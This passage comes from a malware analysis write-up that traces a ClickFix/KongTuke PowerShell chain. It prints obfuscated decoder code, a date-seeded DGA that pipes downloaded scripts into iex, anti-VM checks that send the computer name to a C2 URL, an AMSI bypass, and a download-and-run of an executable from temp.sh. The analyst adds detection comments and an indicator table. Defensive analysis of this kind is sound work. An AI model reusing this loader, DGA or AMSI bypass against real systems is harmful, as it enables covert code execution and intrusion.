# Repeating-key XOR: the outer loop has no increment of its own; the inner loop XORs data[i] with key[j],
# advances i, and when i reaches the data length jumps j to the key length so both loops stop. Each
# XORed byte is emitted into $tvagb0cm1dxzfu3 by the $( ... ) subexpression.
$tvagb0cm1dxzfu3 = $(for ($nwatxvpdh51colu = 0; $nwatxvpdh51colu -lt $cdj7kh3y9t4p12o.((-join (@((1588-1480),(1987-(7657160/(-5703+(9858-95)))),(-9939+10049),(7561-7458),(277936/2396),(1267-(9173744/(14572-6684))))| ForEach-Object { [char]$_ }))); ) {
for ($zyh49qjr5aogvnc = 0; $zyh49qjr5aogvnc -lt $0rgifljwdktcpsh.(([system.String]::new(@((7139-(8535634/1214)),(-8278+8379),(956560/8696),(-3282+(29581515/8739)),(-3262+3378),(315328/(8210656/(19069736/7042))))))); $zyh49qjr5aogvnc++) {
$cdj7kh3y9t4p12o[$nwatxvpdh51colu] -bxor $0rgifljwdktcpsh[$zyh49qjr5aogvnc]
$nwatxvpdh51colu++
if ($nwatxvpdh51colu -ge $cdj7kh3y9t4p12o.(([system.String]::new(@((168112/(3731-(6156507/4053))),(8321-(58600380/(30654700/4300))),(360250/3275),(242050/2350),(9588-(10245-(4514320/(52005200/(1757+7148))))),(-543+647)))))) {
$zyh49qjr5aogvnc = $0rgifljwdktcpsh.(([system.String]::new(@((809892/(15424-(15942-8017))),(5619-(28677046/5197)),(362340/3294),(-71+174),(-4316+4432),(9609-9505)))))
}
}
})
# Input MemoryStream over the XORed bytes, an empty output MemoryStream, and a GZipStream opened in
# Decompress mode over the input (type names per the author's rewrite).
$t83x9o2mapw1vjf = New-Object ((-join (@((8944-(8912-(-621+(-7869+(1054+(5934+1553)))))),(-7112+7233),(1050870/9138),(1066968/9198),(897284/(6766+(-7672+(6941+2849)))),(5312-(-1469+(48752304/7307))),(8942-(62476608/(16529-9506))),(415735/5695),(3640-3561),(-1601+1647),(1854-(9794824/5512)),(993840/(17106-7266)),(-3721+(13158-9328)),(602397/(-1189+(13744-7128))),(908124/7966),(1071697/(19038-(18201-(5259+2761)))),(294899/(-5398+(3627+5324))),(792744/(-1758+8592)),(3491-3377),(565701/5601),(177801/(15602496/(12410-(36438504/9348)))),(952442/(84077036/(81873598/8509))))| ForEach-Object { [char]$_ })))( , $tvagb0cm1dxzfu3 )
$38rwkse62yg4qa0 = New-Object (([system.String]::new(@((-8595+(78188780/(11023-(1202+(9129-8318))))),(824010/6810),(8972-(873+7984)),(487-371),(-8874+(27669925/3083)),(901212/8268),(299276/6506),(4477-4404),(6569-(3630+2860)),(382444/8314),(-7894+7971),(-6485+(1896+4690)),(648877/5953),(467976/(36670768/(85396964/(13719-3901)))),(44460/390),(589-468),(-190+273),(200448/(872+(6639136/7756))),(5686-(-3471+(16990-(2479+5468)))),(303404/3004),(927902/(15661-6095)),(-8353+(81142118/(11798-(-1987+4196))))))))
$izwbvxnk1dy70ua = New-Object ((-join (@((4826-(15922251/3357)),(109021/901),(2958-2843),(2984-(4343-(-991+2466))),(415009/4109),(-9208+9317),(-796+842),(3217-3144),(-8004+(10689-2606)),(2168-(8650-(15707-(17531890/(1949-39))))),(-7656+(12645-4922)),(4881-(7626-(14160048/(11781-6823)))),(-2626+2735),(10175-(69183125/6875)),(8940-8826),(310-(361361/(-4560+(55236287/8783)))),(-6773+6888),(3006-2891),(647115/6163),(-4651+4762),(-2932+(-6985+10027)),(8991-(6257+2688)),(-8230+(15723-7422)),(54290/445),(8751-8646),(-7603+(10129795/1313)),(710812/(73581888/8592)),(8205-8089),(785346/(12696427/1843)),(-6839+6940),(4664-4567),(-4817+(21364062/4337)))| ForEach-Object { [char]$_ })))($t83x9o2mapw1vjf, ([IO.Compression.CompressionMode]::Decompress))
# CopyTo the output stream, Close the gzip and input streams, then ToArray() -> decompressed script bytes.
# Nothing is written to disk in this function; the caller turns the bytes into text and runs them.
$izwbvxnk1dy70ua.(([system.String]::new(@((208035/3105),(-9809+(8022+1898)),(-3220+3332),(900119/(14275441/(-473+(-444+(-1187+4023))))),(574560/(11935-(9775-(9523800/2035)))),(-5756+5867)))))( $38rwkse62yg4qa0 )
$izwbvxnk1dy70ua.((-join (@((640-573),(-6092+6200),(966477/8707),(-8618+8733),(371074/3674))| ForEach-Object { [char]$_ })))()
$t83x9o2mapw1vjf.((-join (@((7401-7334),(789-681),(2203-(9034-6942)),(4798-(3203+1480)),(-6125+(-3708+(16915-(40329237/(10776-(-3755+(12585-3831))))))))| ForEach-Object { [char]$_ })))()
[byte[]] $r6wh7i9p8fzv1lx = $38rwkse62yg4qa0.((-join (@((9596-(89127440/(17950-(14116-(11614-6078))))),(163-(4316/(7370-(11739-4452)))),(-1416+1481),(-9120+(1614+(3413760/(-2611+3059)))),(-6830+(5861+1083)),(-8448+8545),(1099406/(3539+(4209+1338))))| ForEach-Object { [char]$_ })))()
$icgbqjf6uv18y2r=$r6wh7i9p8fzv1lx
return $icgbqjf6uv18y2r
}
# set-alias gotoany iex -- the three expressions evaluate to 105, 101, 120 ('i','e','x')
set-alias gotoany ([char[]]@((30975/(870840/(3137976/1063))),(896779/(2023+6856)),(3121-3001)) -join '')
# [System.Text.Encoding]::ascii.GetString(<decoded bytes>) | iex : the member name evaluates to
# 'GetString', so the decompressed stage-five script is turned into text and executed in memory
[System.Text.Encoding]::ascii.(([char[]]@((-2378+2449),(-8442+8543),(1133668/9773),(450275/(12481-7056)),(-2571+(12797-(14423-4313))),(-1135+1249),(5330-5225),(1007710/(71840562/7842)),(895894/8698)) -join ''))((c27y3zjqxphs08nor6mua5fbg9w "<encoded string>"))|gotoany;
The base64 encoded execution decodes to the following DGA - again, see Huntress.
# Stage four, decoded from the -e <base64> argument: a date-seeded DGA.
# The [int] cast applies to ((DayOfYear+3)/7)+2024, and that integer is then multiplied by 558964, so the
# seed changes roughly once a week and depends on nothing victim-specific -- the candidate list for any
# date can be regenerated from this snippet alone.
$random = New-Object ('System.Random')([int]((((Get-Date).DayOfYear+3) / 7) +2024)*558964)
$domainNames = @()
# 36-symbol alphabet, 15 symbols per label, 10 candidates, all under .top
$characters = 'abcdefghijklmnopqrstuvwxyz0123456789'
$numDomains = 10
for ($j = 0;
$j -lt $numDomains;
$j++) {
$result = ""
for ($i = 0;
$i -lt 15;
$i++) {
$result += $characters[$random.Next(0, 36)]
}
$domainNames += $result + '.top'
}
# First responder wins: curl is the Windows PowerShell alias for Invoke-WebRequest (-useb =
# -UseBasicParsing); the body is piped straight into iex and break stops after the first successful
# fetch. The empty catch silently skips unregistered/unreachable candidates. The s= GUID is a constant
# in the script, so the query string is a usable URI indicator independent of the generated host.
foreach($domainname in $domainNames){
try{
curl -useb "$domainname/1.php?s=04e1ab2b-3f93-46fa-9aed-c3a2a3f126c9"|iex;
break;
}catch{}
}
The encoded string at the end is GZIP data that gets decompressed and returned as an executable string after processing through the c27y3zjqxphs08nor6mua5fbg9w function (renamed decode below).
# Analyst rewrite of c27y3zjqxphs08nor6mua5fbg9w with readable variable names. The obfuscated member-name
# arithmetic is kept verbatim so the listing still matches the sample; the <# #> notes give the decoded
# name or intent of each call. Pipeline, as reconstructed:
#   base64 -> repeating-key XOR (key = ASCII bytes of "xiquayg9wo0c") -> GZIP decompress -> byte[]
# The caller turns the byte[] into text with GetString and pipes it to iex.
function decode {param($encoded_string )
$decoded_one = [System.Convert].((-join (@((-1775+(-6567+(84197304/10008))),(1126-1025),(408552/(9450-5928)),(727034/9442),(587719/(9041-(8786-(-1705+(57316065/7885))))),(10353-10237),(1043120/(13363-(9630-(3485+(6594-3782))))),(-6688+(10350-3551)),(397300/3973))| ForEach-Object { [char]$_ })))((-join (@((315770/4511),(1061796/9314),(750249/(11704-4945)),(396869/(6921541/(8195211/4311))),(-1858+(16888872/8778)),(849720/(7479+1281)),(7484-(12217802/(148+(7098510/4701)))),(750228/(1983276/(724905/(3209-(10667-(82635279/(20266885/(2391+(825240/(4496+3439)))))))))),(-6784+(225+6613)),(-2300+2352),(-10080+(23791583/2341)),(-7124+7240),(8607-(15613-(13808-6688))),(7120-7015),(6908-(1407+5391)),(8232-8129))| ForEach-Object { [char]$_ }))).((-join (@((259515/(103+(25137464/(12346-5064)))),(-1521+1631),(941994/(12233-4250)),(-4292+(1495+2908)),(763231/(-2255+(212+(19386-(3579+(3330+3301)))))),(-5159+5260))| ForEach-Object { [char]$_ })))($null, @($encoded_string))
<#
reflection call on [System.Convert] (GetMethod(...).Invoke($null, @($encoded_string))): base64-decodes the
input to a byte array, which is processed further below
#>
$ascii_bytes= $ascii.(([char[]]@((707870/(97775790/9807)),(3336-(1986290/(1573682/2563))),(-305+421),(587598/(87142564/(6944+2844))),(642026/(1165+(35169513/8493))),(7091-6975),(4731-4630),(9752-9637)) -join ''))("xiquayg9wo0c")
<#
= [System.Text.Encoding]::ascii.GetBytes("xiquayg9wo0c")  -- the 12-byte XOR key
#>
$decoded_one_clone = $decoded_one
$bxor_decode = $(
for ($count = 0;$count -lt $decoded_one_clone.((-join (@((1588-1480),(1987-(7657160/(-5703+(9858-95)))),(-9939+10049),(7561-7458),(277936/2396),(1267-(9173744/(14572-6684))))| ForEach-Object { [char]$_ })));) {
<#
outer loop: for ($count = 0; $count -lt $decoded_one_clone.length; ) -- note there is no increment here,
$count is advanced by the inner loop
#>
for ($count_2 = 0;$count_2 -lt $ascii_bytes.(([system.String]::new(@((7139-(8535634/1214)),(-8278+8379),(956560/8696),(-3282+(29581515/8739)),(-3262+3378),(315328/(8210656/(19069736/7042)))))));$count_2++) {
<#
inner loop: for ($count_2 = 0; $count_2 -lt $ascii_bytes.length; $count_2++)
#>
$decoded_one_clone[$count] -bxor $ascii_bytes[$count_2]
<#
data[$count] XOR key[$count_2]; each result is emitted into $bxor_decode by the enclosing $( ... )
#>
$count++
<#
advance the data index (the outer loop's counter)
#>
if ($count -ge $decoded_one_clone.(([system.String]::new(@((168112/(3731-(6156507/4053))),(8321-(58600380/(30654700/4300))),(360250/3275),(242050/2350),(9588-(10245-(4514320/(52005200/(1757+7148))))),(-543+647)))))) {
$count_2 = $ascii_bytes.(([system.String]::new(@((809892/(15424-(15942-8017))),(5619-(28677046/5197)),(362340/3294),(-71+174),(-4316+4432),(9609-9505)))))
}
}
}
)
<#
once $count reaches the data length, $count_2 is set to the key length so the inner loop ends and the
outer condition fails on the next check: a plain repeating-key XOR over the whole buffer
#>
$memory_stream = New-Object ((-join (@((8944-(8912-(-621+(-7869+(1054+(5934+1553)))))),(-7112+7233),(1050870/9138),(1066968/9198),(897284/(6766+(-7672+(6941+2849)))),(5312-(-1469+(48752304/7307))),(8942-(62476608/(16529-9506))),(415735/5695),(3640-3561),(-1601+1647),(1854-(9794824/5512)),(993840/(17106-7266)),(-3721+(13158-9328)),(602397/(-1189+(13744-7128))),(908124/7966),(1071697/(19038-(18201-(5259+2761)))),(294899/(-5398+(3627+5324))),(792744/(-1758+8592)),(3491-3377),(565701/5601),(177801/(15602496/(12410-(36438504/9348)))),(952442/(84077036/(81873598/8509))))| ForEach-Object { [char]$_ })))( , $bxor_decode )
<#
System.IO.MemoryStream over the XORed bytes (the leading comma passes the array as a single argument)
#>
$System_IO_MemoryStream = New-Object (([system.String]::new(@((-8595+(78188780/(11023-(1202+(9129-8318))))),(824010/6810),(8972-(873+7984)),(487-371),(-8874+(27669925/3083)),(901212/8268),(299276/6506),(4477-4404),(6569-(3630+2860)),(382444/8314),(-7894+7971),(-6485+(1896+4690)),(648877/5953),(467976/(36670768/(85396964/(13719-3901)))),(44460/390),(589-468),(-190+273),(200448/(872+(6639136/7756))),(5686-(-3471+(16990-(2479+5468)))),(303404/3004),(927902/(15661-6095)),(-8353+(81142118/(11798-(-1987+4196))))))))
<#
empty System.IO.MemoryStream that receives the decompressed output
#>
$GZIP = New-Object ((-join (@((4826-(15922251/3357)),(109021/901),(2958-2843),(2984-(4343-(-991+2466))),(415009/4109),(-9208+9317),(-796+842),(3217-3144),(-8004+(10689-2606)),(2168-(8650-(15707-(17531890/(1949-39))))),(-7656+(12645-4922)),(4881-(7626-(14160048/(11781-6823)))),(-2626+2735),(10175-(69183125/6875)),(8940-8826),(310-(361361/(-4560+(55236287/8783)))),(-6773+6888),(3006-2891),(647115/6163),(-4651+4762),(-2932+(-6985+10027)),(8991-(6257+2688)),(-8230+(15723-7422)),(54290/445),(8751-8646),(-7603+(10129795/1313)),(710812/(73581888/8592)),(8205-8089),(785346/(12696427/1843)),(-6839+6940),(4664-4567),(-4817+(21364062/4337)))| ForEach-Object { [char]$_ })))($memory_stream, ([IO.Compression.CompressionMode]::Decompress))
<#
System.IO.Compression.GzipStream over $memory_stream in Decompress mode
#>
$GZIP.(([system.String]::new(@((208035/3105),(-9809+(8022+1898)),(-3220+3332),(900119/(14275441/(-473+(-444+(-1187+4023))))),(574560/(11935-(9775-(9523800/2035)))),(-5756+5867)))))( $System_IO_MemoryStream )
<#
CopyTo($System_IO_MemoryStream): decompresses everything into the output stream
#>
$GZIP.((-join (@((640-573),(-6092+6200),(966477/8707),(-8618+8733),(371074/3674))| ForEach-Object { [char]$_ })))()
<#
Close() the gzip stream
#>
$memory_stream.((-join (@((7401-7334),(789-681),(2203-(9034-6942)),(4798-(3203+1480)),(-6125+(-3708+(16915-(40329237/(10776-(-3755+(12585-3831))))))))| ForEach-Object { [char]$_ })))()
<#
Close() the input memory stream
#>
[byte[]] $decompressed_array = $System_IO_MemoryStream.((-join (@((9596-(89127440/(17950-(14116-(11614-6078))))),(163-(4316/(7370-(11739-4452)))),(-1416+1481),(-9120+(1614+(3413760/(-2611+3059)))),(-6830+(5861+1083)),(-8448+8545),(1099406/(3539+(4209+1338))))| ForEach-Object { [char]$_ })))()
<#
ToArray(): read the decompressed bytes out of the output stream; the script never touches disk
#>
$decompressed_array_clone=$decompressed_array
return $decompressed_array_clone
}
Stage Five
The GZIP’d data results in a script that performs multiple in-depth virtualization checks. I’ve put the code below, with comments for the checks/results. Each switch statement adds a value to an array used for key generation in the final URL ($dnelptozq).
Note: This was really bothering me with how gross it was, so I took out the code for the second and third checks. They look like the first call to Get-MpComputerStatus, just bigger and uglier.
# Stage Five as captured (second and third checks redacted by the author). Flow: anti-VM
# checks populate $dnelptozq, a seeded PRNG generates the next host, then the response
# from the C2 URL is executed with iex. The stage runs inside the same interpreter,
# so nothing here touches disk; detection has to rely on script-block logging and the
# outbound request itself.
# Property name for Get-MpComputerStatus is assembled from arithmetic char codes at
# runtime via $ExecutionContext.InvokeCommand.ExpandString (author's decode: IsVirtualMachine).
$global:yizxgjtrvb=$executioncontext;$znypogdhsacmq=(Get-MpComputerStatus).($global:yizxgjtrvb.([system.String]::new(@((-6748+(4913601/(1027-(110670/(2511138/(7675-(2816-(3174-(-998+(5318011/(1975946/742))))))))))),(557-447),(4241-(-4799+8922)),(305361/(15790740/5740)),(-5951+(-1220+(9028-(4745-(10821-7826))))),(9517-9416),(3866-3767),(117327/1057),(406679/(-1428+5159)),(-4989+5098),(485-388),(9306-(15466-6270)),(-1258+1358)))).(-join (@((-2832+(10259634/(1616076/462))),(-6012+6132),(-8060+(64607832/7906)),(-6507+(14082-7478)),(-353+(4184131/(9290-253))),(-8684+(17245-8461)),(120290/(3670414/3509)),(1041-(7551-6626)),(-3607+(24387434/(-362+6916))),(523005/(12621-7640)),(248600/(5026-2766)),(981487/(33427732/(-2542+(10876-4826)))))| ForEach-Object { [char]$_ }))([char[]]@( (-5165+(12109-6871)),(-761+(-4895+5771)),(263762/3067),(633150/(60143220/(12223-2249))),(3551-3437),(-6148+6264),(-3561+(22483614/(-3080+(18833-9640)))),(302543/(4262-(10066-(2161+6762)))),(321-213),(-1001+1078),(336493/(-6390+(13812-3953))),(8148-8049),(460616/4429),(600705/(28278903/4943)),(8493-(9665599/1153)),(9309-9208)) -join ''))
# (Get-MpComputerStatus).($ExecutionContext.InvokeCommand.ExpandString('IsVirtualMachine'))
# Check 1 — body redacted by the author; the switch branches append to $dnelptozq.
switch($true){
# IsVirtualMachine
# checks to see if device is virtual machine
}
# Check 2 — body redacted by the author.
# get-wmiobject Win32_VideoController | Select AdapterDACType
switch($true){
# Win32_VideoController
# AdapterDACType
# Looks for VMWare, Bochs, Intel, SeaBIOS, and internal/integrated
}
# Check 3 — body redacted by the author.
# Get-WmiObject Win32_CacheMemory | Select purpose
switch($true){
# Win32_CacheMemory - selects purpose property
# Looks for L1 cache and the length of the purpose property
}
# DGA seed. The char array evaluates to the type name System.Random; the constructor
# argument is (Get-Date).DayOfYear plus an arithmetic constant, so the seed — and the
# generated host — depends on the day of the year rather than on anything host-specific.
$cpizuyxgbjwmh = New-Object (([char[]]@((-9932+10015),(-9080+(74132457/(4822+(8254-(23498958/(7511-(11267-(18235-(17915-(8620-(-5043+5545))))))))))),(4462-(23586822/5426)),(607144/5234),(-95+196),(67253/(1126025/1825)),(-2857+2903),(1378-1296),(2036-1939),(7523-7413),(385500/(-2735+6590)),(9155-9044),(4779-4670)) -join ''))([int](Get-Date).DayOfYear + ((30216909/(6702019/(-2659+3876)))-((16741421892/(-126+(4267374/4922)))/((7155-(2552+3341))+(-4866+10130)))) * ((1478698343+(82136475/10035))/((25489754+7699)/((67059924/7053)-(281820/4620)))));
# Builds the hostname one character at a time: each iteration picks an index with
# $cpizuyxgbjwmh.Next() into a 14-character alphabet assembled from arithmetic char
# codes. In this sample the loop bounds evaluate to 0 and 15, matching the 15-character
# .top host in the indicator table.
for ($zifdvumxwayk = ((9687-9687)/((34933204+(6453486/(9387300/(9679-5529))))/(7297888/(8493568/(12525008/2501))))); $zifdvumxwayk -lt ((15118452/(31888212/(-3568+(15838-(45183927/(13374-8085))))))-((-2759+10189)-((32181602+(35744580/5121))/(11232-5563)))); $zifdvumxwayk++) {$dmgnorw += (([system.String]::new(@((8539-8442),(-6211+(6664-(1460470/(9813-(51085836/(2155+(13217-6408))))))),(508167/(8454-(21729303/(-1205+(4695+3053))))),(606700/(12377-6310)),(1016-(6343-5428)),(1022550/(9159+866)),(-1300+1403),(89024/(3486488/4073)),(4819-4714),(3860-(36845510/9815)),(108391/1013),(946188/(963710/110)),(4469/(-6821+(8101-(8720082/7038)))),(613580/(5412+166))))))[$cpizuyxgbjwmh.Next(((20911104/(3267-195))-(3813+2994)), ((634-10145)+(21259800/(7669152/3436))))];}
# Appends the TLD; the four char codes evaluate to ".top".
$xq4c93ti6g2whv0=$dmgnorw + (-join (@((238418/5183),(9348-(424+8808)),(682539/6149),(754992/(11789-(42605120/(4179+(-4233+(7769+725)))))))| ForEach-Object { [char]$_ }));
# Random 10-char and 5-char alphanumeric strings (digits + lowercase). The 5-char
# value is not referenced anywhere in the visible script.
$ar9cw4fyn65oi1v=-join ((48..57) + (97..122) | Get-Random -Count 10| % {[char]$_});
$bocuhdvkprxezij=-join ((48..57) + (97..122) | Get-Random -Count 5 | % {[char]$_});
# Script name = <10 random chars> + "htr" + $findom. $findom is not defined in the
# visible script; in the captured Stage 5 URL (…rehtr.php) it appears to be empty — TODO confirm.
$ir9uqjmg4zxwpf2="$($ar9cw4fyn65oi1v)htr$($findom)";
# 'curl' is the Windows PowerShell alias for Invoke-WebRequest; -useb = -UseBasicParsing.
# Plain HTTP; the query string leaks $env:computername, carries the anti-VM result as
# key=, and a fixed s= GUID. The static GUID and the "htr.php" suffix are the most
# stable pieces of this URL for network detection.
$global:block=(curl -useb "http://$xq4c93ti6g2whv0/$ir9uqjmg4zxwpf2.php?id=$env:computername&key=$dnelptozq&s=63e95be1-92e0-45c1-a928-65d63b17cd1c");
# Executes whatever the server returned in-memory (Stage Six below).
iex $global:block
After the virtualization checks, the script uses the DGA output as the host and the built array as the key to generate the URL for retrieving the final payload. I wrote a decoder for this, but you can pretty much rebuild it by following the code logic.
Stage Six
The final stage!
Just an AMSI bypass, followed by an Invoke-WebRequest that pulls a binary into the user’s temp directory and starts it. Much like Huntress’s write up, this binary was no longer available at the time of analysis. The file host temp.sh only hosts files for three days before deletion.
# Stage Six as captured. Type and field names are obfuscated with diacritics and
# recovered at runtime via .Normalize('FormD') plus a -replace that strips \p{Mn}
# combining marks (both strings are built from [char] arithmetic). Reflection then sets
# a non-public static field to $true on a type resolved from [Ref].Assembly — the
# author identifies this as an AMSI bypass. The Sleep(833) precedes the reflection call.
# Detection angle: [Ref].Assembly.GetType(...).GetField(..., "NonPublic,Static").SetValue
# and Normalize/\p{Mn} string rebuilding are both visible in script-block logs.
$Q=$null;$acce="$(('Syst'+'em').NorMaLizE([CHar]([byTe]0x46)+[chAr](46+65)+[CHar]([BYte]0x72)+[cHAR]([bYtE]0x6d)+[CHaR]([bytE]0x44)) -replace [CHAr]([ByTE]0x5c)+[cHaR]([bYtE]0x70)+[ChAR](123)+[chaR](77)+[cHAR](110+19-19)+[chAR]([byTE]0x7d)).$(('Mânãgeme'+'nt').normALiZE([CHar]([bYTe]0x46)+[CHAr](41+70)+[CHaR]([bytE]0x72)+[ChaR]([ByTE]0x6d)+[CHar](68+11-11)) -replace [CHaR]([bytE]0x5c)+[ChAR](112)+[Char](123+74-74)+[cHAr]([Byte]0x4d)+[CHAr](97+13)+[CHAR](125*89/89)).$(('Á'+'u'+'t'+'õ'+'m'+'â'+'t'+'î'+'ô'+'n').NOrmAlIZE([cHaR](70)+[CHAR]([BYTe]0x6f)+[cHar](114+105-105)+[ChAr]([BYtE]0x6d)+[ChaR]([BYte]0x44)) -replace [CHAr](92)+[cHAr](112*93/93)+[CHAr](123)+[char](77)+[cHAr]([byte]0x6e)+[ChaR](125*47/47)).$(('ÀmsìUt'+'îls').noRmAlize([char](70+6-6)+[CHAR]([bYte]0x6f)+[cHar](86+28)+[cHAR](109)+[cHar]([byTE]0x44)) -replace [CHaR]([bYtE]0x5c)+[chAr](112*84/84)+[ChaR](123*9/9)+[cHaR]([BytE]0x4d)+[CHAr](110+101-101)+[chaR](125*35/35))";$piooz="+('ydml'+'ftbg'+'mejg'+'nrrh'+'cpvs'+'vrîx').NOrmalizE([ChAR](70+28-28)+[ChAr]([bYTE]0x6f)+[Char](6+108)+[CHaR]([bYTe]0x6d)+[cHaR](68*41/41)) -replace [Char]([byTE]0x5c)+[ChAR]([BytE]0x70)+[chAr](123)+[chaR](77*12/12)+[ChAR](110+73-73)+[ChAr]([BytE]0x7d)";[Threading.Thread]::Sleep(833);[Ref].Assembly.GetType($acce).GetField($(('ámsíÎ'+'nìtFä'+'îled').NorMalizE([cHAR]([byte]0x46)+[CHaR]([BYTe]0x6f)+[chAr](114*62/62)+[CHar]([bYTE]0x6d)+[chAR](68)) -replace [cHar]([byte]0x5c)+[chAR]([BytE]0x70)+[Char]([bYTE]0x7b)+[cHAR]([Byte]0x4d)+[chAr]([BYTE]0x6e)+[cHAR](125+102-102)),"NonPublic,Static").SetValue($Q,$true);
# Download over plain HTTP with -Method POST (unusual for a file fetch, and a useful
# proxy-log discriminator) into the user's temp directory as aa.exe. The author notes
# the file was already gone from temp.sh at analysis time, so the payload is unknown.
Invoke-WebRequest "http://temp.sh/utDKu/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe" -Method POST -OutFile "$env:temp\aa.exe"
# Launches the dropped executable from %TEMP% — a process-creation event worth alerting on.
start-process "$env:temp\aa.exe"
Final Thoughts
As much as I like puzzles, this was kind of annoying and kind of disappointing. I’d really like to have seen the payload at the end. At least it was more interesting than the SSA phishing stuff I’ve been looking at recently.
Indicators
| Indicator | Description |
|---|---|
| hxxps[://]kenco[.]com/ | Compromised WordPress Domain |
| hxxps[://]wilknnson[.]com/6j6s[.]js | ClickFix Inject |
| 45[.]61[.]138[.]224 | KongTuke C2 |
| hxxp[://]syzv21d[.]top/1[.]php | Workgroup Payload |
| 4el0z88umiyauh5[.]top/1[.]php | Stage 4 |
| jhbghlmjhfejbaj[.]top/62gmlxw5rehtr[.]php | Stage 5 |
| hxxp[://]temp[.]sh/utDKu/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa[.]exe | Final payload - unable to retrieve |